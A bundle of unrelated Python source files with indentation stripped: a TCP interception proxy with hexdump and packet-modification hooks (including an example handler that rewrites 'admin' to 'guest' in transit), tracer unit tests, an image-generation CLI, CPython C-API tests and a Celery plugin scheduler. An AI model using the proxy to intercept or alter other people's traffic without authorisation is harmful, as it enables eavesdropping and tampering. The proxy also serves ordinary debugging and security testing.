| source | python |
|---|---|
tcp_proxy.py
|
#!/usr/bin/env python3
import sys
import socket
import threading
import getopt
import subprocess
from colorama import init
from termcolor import cprint
from pyfiglet import figlet_format
def usage():
cprint(figlet_format('Proxy',font='dotmatrix'),'yellow','on_red',attrs=['bold'])
if len(sys.argv[1:]) != 5:
print ("Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]")
print ("Example:- ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")
sys.exit(0)
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
server.bind((local_host,local_port))
except:
print("[!!] Failed to listen on %s:%d %(local_host,local_port)")
print("[!!] Check for other listening sockets or correct permissions.")
sys.exit(0)
print("[*] Listening on %s:%d" %(local_host,local_port))
server.listen(5)
while True:
client_socket,addr = server.accept()
#print out the local connection information
print("[==>] Received incoming connection from %s:%d" %(addr[0],addr[1]))
#start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))
proxy_thread.start()
def proxy_handler(client_socket,remote_host,remote_port,receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
# receive data from the remote end if necessary
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
# send it to our response handler
remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client, send it
if len(remote_buffer):
print("[<==] Sending %d bytes to localhost." %len(remote_buffer))
client_socket.send(remote_buffer)
#now lets loop and read from local
#send to remote, send to local
#rinse, wash, repeat
while True:
#read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print("[==>] Received %d bytes from localhost." %len(local_buffer))
hexdump(local_buffer)
#send it to our request handler
local_buffer = request_handler(local_buffer)
#send off the data to the remote host
remote_socket.send(local_buffer)
print("[==>] Sent to remote.")
#receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." %len(remote_buffer))
hexdump(remote_buffer)
#send to our response handler
remote_buffer = response_handler(remote_buffer)
#send the response to the local socket
client_socket.send(remote_buffer)
print("[<==] Sent to localhost")
# if no more data on either side, close the connections
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print("[*] No more data.Closing connections.")
break
# this is a pretty hex dumping function directly taken from the comments here:
def hexdump(src, length=16):
result = []
# src is bytes under Python 3, so two hex digits per byte
digits = 2
for i in range(0, len(src), length):
s = src[i:i + length]
hexa = ' '.join(["%0*X" % (digits, byte) for byte in s])
text = ''.join([chr(byte) if 0x20 <= byte < 0x7F else '.' for byte in s])
result.append("%04X   %-*s   %s" % (i, length * (digits + 1), hexa, text))
print('\n'.join(result))
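# Quick usage sketch (illustrative only, not in the original script):
# hexdump(b"ABC\x00\x01hello") prints the offset, the hex bytes and the printable ASCII.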
def receive_from(connection):
buffer = b""
# We set a 2 second timeout; depending on your target, this may need to be adjusted
connection.settimeout(2)
try:
# keep reading into the buffer until
# there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
# modify any requests destined for the remote host
def request_handler(buffer):
# perform packet modifications
return buffer
def response_handler(buffer):
#perform packet modifications
return buffer
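# Illustrative sketch (not part of the original script): a handler that tampers
# with traffic in flight. The byte substitution below is hypothetical; swap it
# in for request_handler above to experiment with on-the-fly modifications.
def example_request_handler(buffer):
    # e.g. downgrade a hypothetical credential string before forwarding
    return buffer.replace(b"admin", b"guest")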
def main():
usage()
# set up local listening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
#this tells our proxy to connect and receive data
#before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host,local_port,remote_host,remote_port,receive_first)
main()
|
test_tracer.py
|
import opentracing
from opentracing import (
child_of,
Format,
InvalidCarrierException,
UnsupportedFormatException,
SpanContextCorruptedException,
)
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer, set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
import pytest
from .utils import ot_tracer_factory, ot_tracer, writer
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {"enabled": True}
tracer = Tracer(service_name="myservice", config=config)
assert tracer._service_name == "myservice"
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == "pytest"
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {"enabled": True}
tracer1 = Tracer(service_name="serv1", config=config)
assert tracer1._service_name == "serv1"
config["enabled"] = False
tracer2 = Tracer(service_name="serv2", config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == "serv1"
assert tracer1._enabled is True
assert tracer2._service_name == "serv2"
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {"enabeld": False}
# Without the debug flag this should not raise an error
tracer = Tracer(service_name="mysvc", config=config)
# With debug flag should raise an error
config["debug"] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert "enabeld" in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config["setttings"] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name="mysvc", config=config)
assert ["enabeld", "setttings"] in str(ce_info)
assert tracer is not None
class TestTracer(object):
def test_start_span(self, ot_tracer, writer):
"""Start and finish a span."""
import time
with ot_tracer.start_span("myop") as span:
time.sleep(0.005)
# span should be finished when the context manager exits
assert span._finished
spans = writer.pop()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, writer):
"""Start a span using references."""
with ot_tracer.start_span("one", references=[child_of()]):
pass
spans = writer.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span("root")
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span("one"):
with ot_tracer.start_active_span("two", references=[child_of(root.span)]):
pass
root.close()
spans = writer.pop()
assert spans[2].parent_id is spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
import time
t = time.time() + 0.002
with ot_tracer.start_span("myop", start_time=t) as span:
time.sleep(0.005)
# it should be certain that the span duration is strictly less than
# the amount of time we sleep for
assert span._dd_span.duration < 0.005
def test_start_span_with_spancontext(self, ot_tracer, writer):
"""Start and finish a span using a span context as the child_of
reference.
"""
import time
with ot_tracer.start_span("myop") as span:
time.sleep(0.005)
with ot_tracer.start_span("myop", child_of=span.context) as span2:
time.sleep(0.008)
# span should be finished when the context manager exits
assert span._finished
assert span2._finished
spans = writer.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {"key": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
assert span._dd_span.get_tag("key") == "value"
assert span._dd_span.get_tag("key2") == "value2"
def test_start_active_span_multi_child(self, ot_tracer, writer):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
import time
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span._finished
assert scope2.span._finished
assert scope3.span._finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, writer):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
import time
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span._finished
assert scope2.span._finished
assert scope3.span._finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
import time
root = ot_tracer.start_span("zero")
with ot_tracer.start_span("one", child_of=root):
time.sleep(0.009)
with ot_tracer.start_span("two", child_of=root):
time.sleep(0.007)
with ot_tracer.start_span("three", child_of=root):
time.sleep(0.005)
root.finish()
spans = writer.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
def test_start_span_no_active_span(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
import time
with ot_tracer.start_span("one", ignore_active_span=True):
time.sleep(0.009)
with ot_tracer.start_span("two", ignore_active_span=True):
time.sleep(0.007)
with ot_tracer.start_span("three", ignore_active_span=True):
time.sleep(0.005)
spans = writer.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, writer):
"""Start a child span and finish it after its parent."""
import time
span1 = ot_tracer.start_active_span("one").span
span2 = ot_tracer.start_active_span("two").span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = writer.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, writer):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
import time
def trace_one():
id = 11
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.009)
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.001)
with ot_tracer.start_active_span(str(id)):
pass
def trace_two():
id = 21
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.006)
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.009)
with ot_tracer.start_active_span(str(id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t1.daemon = True
t2 = threading.Thread(target=trace_two)
t2.daemon = True
t1.start()
t2.start()
# wait for threads to finish
time.sleep(0.018)
spans = writer.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == "11"
assert spans[1].name == "12"
assert spans[2].name == "13"
assert spans[3].name == "21"
assert spans[4].name == "22"
assert spans[5].name == "23"
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert (
spans[3].trace_id == spans[4].trace_id
and spans[4].trace_id == spans[5].trace_id
)
def test_start_active_span(self, ot_tracer, writer):
with ot_tracer.start_active_span("one") as scope:
pass
assert scope.span._dd_span.name == "one"
assert scope.span._finished
spans = writer.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, writer):
with ot_tracer.start_active_span("one", finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == "one"
assert not scope.span._finished
spans = writer.pop()
assert not spans
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span(
"three"
) as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, writer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
outer_scope.span.set_tag("outer", 2)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("three") as innest_scope:
innest_scope.span.set_tag("innerest", 4)
spans = writer.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP, sampled=True)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extration of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span("root") as root:
ctx_before = root.context
root.set_baggage_item("test", 2)
assert ctx_before is not root.context
with ot_tracer.start_span("child") as level1:
with ot_tracer.start_span("child") as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span("root") as root:
# this should be passed down to the child
root.span.set_baggage_item("root", 1)
root.span.set_baggage_item("root2", 1)
with ot_tracer.start_active_span("child") as level1:
level1.span.set_baggage_item("level1", 1)
with ot_tracer.start_active_span("child") as level2:
level2.span.set_baggage_item("level2", 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item("root")
assert level1.span.get_baggage_item("root2")
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item("root")
assert level2.span.get_baggage_item("root2")
assert level2.span.get_baggage_item("level1")
assert level2.span.get_baggage_item("level2")
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer("service")
with tracer.start_span("my_span") as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer("service")
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
main.py
|
import time
import os
import argparse
import multiprocessing as mp
import logging
import cProfile, pstats, io
import random
from page_generator import FragmentPage, FilePersistence
from webserver import Webserver
def worker(input_queue, output_queue):
for func, args in iter(input_queue.get, 'STOP'):
result = func(*args)
output_queue.put(result)
def make_page(idno, options):
start = time.time()
persister = FilePersistence(idno, options)
page = FragmentPage(idno, options, persister)
page.create_page()
page.save()
return (persister.get_count(), time.time() - start)
def generate_pages(options):
num_process = options["cpus"]
start_no = options["initial"]
end_no = options["initial"] + options["count"]
start = time.time()
tasks = [(make_page, (i, options)) for i in range(start_no, end_no + 1)]
# Create queues
task_queue = mp.Queue()
done_queue = mp.Queue()
# Submit tasks
for task in tasks:
task_queue.put(task)
# Start worker processes
for _ in range(num_process):
mp.Process(target=worker, args=(task_queue, done_queue)).start()
counter = 0
total_time = 0.0
for _ in range(len(tasks)):
count, time_taken = done_queue.get()
total_time += float(time_taken)
counter += count
if counter % 500 == 0 and counter:
print(
"Generated {} images, average {:.2f} seconds per image".format(
counter, total_time / counter))
for _ in range(num_process):
task_queue.put('STOP')
print("Generated {} images in {:.2f} seconds".format(
end_no - start_no, time.time() - start))
def get_args() :
parser = argparse.ArgumentParser()
parser.add_argument(
"-t",
"--template",
help="Name (as set in json file - not file name/path) of the template to use. " \
"This file containing this template must reside in the templates directory. " \
"If not set templates are choosen at random")
parser.add_argument(
"--daemon",
help="Instead of writing files to a directory, the process server images over HTTP",
action="store_true")
parser.add_argument(
"-o",
"--output_directory",
help="Directory to write images to",
default="output")
parser.add_argument(
"-w",
"--width",
type=int,
help="Width of generated image",
default=1275)
parser.add_argument(
"-l",
"--height",
type=int,
help="Height of generated image",
default=1755)
parser.add_argument(
"-d",
"--dimension",
type=int,
help="Width of output image",
default=600)
parser.add_argument(
"-i",
"--initial",
type=int,
help="Index of first image",
default=1)
parser.add_argument(
"--cpus",
type=int,
help="Number of processes to spawn, defaults to the number of CPUs available",
default=0)
parser.add_argument(
"-p",
"--port",
type=int,
help="Port HTTP server listens on",
default=80)
parser.add_argument(
"-a",
"--augment",
help="Augment images",
action="store_true")
parser.add_argument(
"-c",
"--chop",
help="Chop up image into subimages",
action="store_true")
parser.add_argument(
"--augmentation_file",
help="JSON file containing parameters for the augmentor",
default="augmentation.json")
parser.add_argument(
"--color_model",
help="Color model to store images as RGB (default) or HSV",
choices=["RGB","HSV"],
default="RGB")
parser.add_argument(
"-f",
"--format",
help="File format to generate, png or jpg (default)",
choices=["jpg", "png"],
default="jpg")
parser.add_argument(
"--profile",
help="Profile code",
action="store_true")
parser.add_argument(
"--wordboxes",
help="Output bounding boxes of words",
action="store_true")
parser.add_argument(
"--erode",
help="Erode images",
choices=[0, 3, 5, 7, 9],
type=int,
default=0)
parser.add_argument(
"-s",
"--single",
help="Generate a page with a single rendering of a template - for testing",
action="store_true")
parser.add_argument(
"--random_seed",
help="Seeds the random number generator with a particular value for EACH PAGE, "
"creating identical pages. For debugging single pages only.")
parser.add_argument(
"--deterministic",
help="Seeds the random number generator with known values, creating same data sets on each run",
action="store_true")
parser.add_argument(
"--log_level",
type=int,
help="Set the level of debug logging, with 4 as most detailed through to 0 as least detailed, default 2",
choices=[0,1,2,3,4],
default=2)
parser.add_argument(
"--test_template",
help="Path to a fragment template to test.")
parser.add_argument("count", type=int, help="Number of images to create or queue size if in daemon mode")
return parser.parse_args()
def setup_logging(args) :
log_levels = [logging.FATAL, logging.ERROR, logging.WARN, logging.INFO, logging.DEBUG]
logging.basicConfig(level=log_levels[args.log_level])
def main():
args = get_args()
setup_logging(args)
options = dict(args.__dict__)
options.update({
"format": args.format.strip(),
"dimensions": (args.width, args.height),
"outputSize": (args.dimension, args.dimension),
"draw_debug_rects" : False,
"draw_final_rects" : False,
"color_model" : args.color_model.upper()
})
if not args.cpus :
options["cpus"] = os.cpu_count()
logging.info("Image dimensions: {dimensions} format: {format}".format_map(options))
if args.profile :
pr = cProfile.Profile()
pr.enable()
for i in range(args.initial, args.initial + args.count) :
count, elapsed = pr.runcall(make_page, *(str(i), options))
print(count, elapsed)
if elapsed > 2 :
ps = pstats.Stats(pr)
ps.sort_stats('cumtime')
ps.print_stats(0.1)
pr.clear()
elif args.daemon :
logging.info("Starting webserver, queue size {}".format(args.count))
server = Webserver(options)
server.start_server()
else :
logging.info("Writing images to: {output_directory}".format_map(options))
logging.info("Generating {} images starting at {}".format(args.count, args.initial))
if options["cpus"] == 1 :
for i in range(args.initial, args.initial + args.count) :
num, elapsed = make_page(str(i), options)
print("{} - {} images in {:.2f} seconds".format(i, num, elapsed))
else:
mp.freeze_support()
generate_pages(options)
if __name__ == '__main__':
main()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
import sys
import unittest
from test import support
import _testcapi
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_main():
support.run_unittest(CAPITest)
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if support.verbose:
print("internal", name)
test()
# some extra thread-state tests driven via _testcapi
def TestThreadState():
if support.verbose:
print("auto-thread-state")
idents = []
def callback():
idents.append(_thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(_thread.get_ident()) != 3:
raise support.TestFailed(
"Couldn't find main thread correctly in the list")
try:
_testcapi._test_thread_state
have_thread_state = True
except AttributeError:
have_thread_state = False
if have_thread_state:
import _thread
import time
TestThreadState()
import threading
t = threading.Thread(target=TestThreadState)
t.start()
t.join()
if __name__ == "__main__":
test_main()
|
scheduler.py
|
"""
Copyright 2018, Oath Inc.
Licensed under the terms of the Apache 2.0 license. See LICENSE file in project root for terms.
This module implements classes that can be used by any Plugin Scheduler to setup a Celery App and Celery Beat
"""
import signal
import sys
import threading
from .. import const
from ..validators import PanoptesValidators
from ..context import PanoptesContextValidators
from ..celery_manager import PanoptesCeleryInstance, PanoptesCeleryValidators
from ..utilities.helpers import get_client_id, get_os_tid
from ..utilities.lock import PanoptesLock
class PanoptesPluginScheduler(object):
"""
This class implements methods to start and manage Celery App and Celery Beat for Plugin Schedulers
Args:
panoptes_context(PanoptesContext): The Panoptes Context instance that should be used by the Plugin Scheduler
plugin_type (str): The type of the plugins the Plugin Scheduler would handle
plugin_type_display_name (str): The display name that should be used by the Plugin Scheduler in logs and errors
celery_config (PanoptesCeleryConfig): The Celery Config instance that should be used by the Plugin Scheduler
lock_timeout (int): The number of seconds to wait before a lock times out and is retried
plugin_scheduler_task (callable): The callback function that the Plugin Scheduler should call every interval
Returns:
None
"""
def __init__(self, panoptes_context, plugin_type, plugin_type_display_name, celery_config, lock_timeout,
plugin_scheduler_task):
assert PanoptesContextValidators.valid_panoptes_context(
panoptes_context), 'panoptes_context must be an instance of PanoptesContext'
assert PanoptesValidators.valid_nonempty_string(plugin_type), 'plugin_type must be a non-empty str'
assert PanoptesValidators.valid_nonempty_string(plugin_type_display_name), \
'plugin_type_display_name must be a non-empty str'
assert PanoptesCeleryValidators.valid_celery_config(
celery_config), 'celery_config must be an instance of PanoptesCeleryConfig'
assert PanoptesValidators.valid_nonzero_integer(lock_timeout), 'lock_timeout must be an int greater than zero'
assert PanoptesValidators.valid_callback(plugin_scheduler_task), 'plugin_scheduler_task must be a callable'
self._panoptes_context = panoptes_context
self._config = self._panoptes_context.config_dict
self._logger = self._panoptes_context.logger
self._shutdown_plugin_scheduler = threading.Event()
self._plugin_scheduler_celery_beat_service = None
self._celery_config = celery_config
self._celery = None
self._t = None
self._lock = None
self._plugin_type = plugin_type
self._plugin_type_display_name = plugin_type_display_name
self._lock_timeout = lock_timeout
self._plugin_scheduler_task = plugin_scheduler_task
def start(self):
"""
This function starts the Plugin Scheduler. It installs signal handlers, acquires a distributed lock and then
returns a Celery application instance
The flow of the startup process is as follows:
start -> _celery_beat_service_started (starts) -> plugin_scheduler_task_thread
The plugin_scheduler_task_thread runs the plugin_scheduler_task every "['plugin_type']['plugin_scan_interval']"
seconds, which comes from the system wide configuration file
The reason for this slightly convoluted startup is that the plugin_scheduler_task needs the Celery Beat
Service instance object so that it can update the schedule periodically, and this instance is only available
after the _celery_beat_service_started callback function is called by Celery Beat
Returns:
celery.app: The Celery App instance to be used by the scheduler
"""
logger = self._logger
logger.info('%s Plugin Scheduler main thread: OS PID: %d' % (self._plugin_type_display_name, get_os_tid()))
logger.info('Setting up signal handlers')
self._install_signal_handlers()
client_id = get_client_id(const.PLUGIN_CLIENT_ID_PREFIX)
lock_path = const.PLUGIN_SCHEDULER_LOCK_PATH + '/' + self._plugin_type + '/lock'
logger.info(
'Creating lock object for %s Plugin Scheduler under lock path "%s"' % (self._plugin_type, lock_path))
try:
self._lock = PanoptesLock(context=self._panoptes_context, path=lock_path, timeout=self._lock_timeout,
retries=0, identifier=client_id)
except Exception as e:
sys.exit('Failed to create lock object: %s' % repr(e))
if self._lock.locked:
logger.info('Starting Celery Beat Service')
try:
self._celery = PanoptesCeleryInstance(self._panoptes_context,
self._celery_config).celery
self._celery.conf.update(
CELERYBEAT_MAX_LOOP_INTERVAL=self._config[self._plugin_type]['celerybeat_max_loop_interval'])
except Exception as e:
logger.error('Error trying to start Celery Beat Service: %s' % str(e))
return self._celery
def run(self, sender=None, args=None, **kwargs):
"""
This function is called after the Celery Beat Service has finished initialization.
The function (re)installs the signal handlers, since they are overwritten by the Celery Beat Service.
It stores the reference to the Celery Beat Service instance and starts the Plugin Scheduler thread
Args:
sender (celery.beat.Service): The Celery Beat Service instance
args: Variable length argument list
**kwargs: Arbitrary keyword arguments
Returns:
None
"""
logger = self._logger
logger.info('Reinstalling signal handlers after Celery Beat Service setup')
self._install_signal_handlers()
self._plugin_scheduler_celery_beat_service = sender
self._t = threading.Thread(target=self._plugin_scheduler_task_thread)
self._t.start()
def _plugin_scheduler_task_thread(self):
"""
This function is the entry point of the Plugin Scheduler thread. It checks if the Plugin Scheduler is in
shutdown mode and, if not, calls the plugin_scheduler_task function every 'plugin_scan_interval'
seconds
Returns:
None
"""
logger = self._logger
logger.info('%s Plugin Scheduler Task thread: OS PID: %d' % (self._plugin_type_display_name, get_os_tid()))
while not self._shutdown_plugin_scheduler.is_set():
if self._lock.locked:
try:
self._plugin_scheduler_task(self._plugin_scheduler_celery_beat_service)
except Exception:
logger.exception('Error trying to execute plugin scheduler task')
else:
logger.warn('%s Plugin Scheduler lock not held, skipping scheduling cycle' % self._plugin_type_display_name)
self._shutdown_plugin_scheduler.wait(self._config[self._plugin_type]['plugin_scan_interval'])
logger.critical('%s Plugin Scheduler Task thread shutdown' % self._plugin_type_display_name)
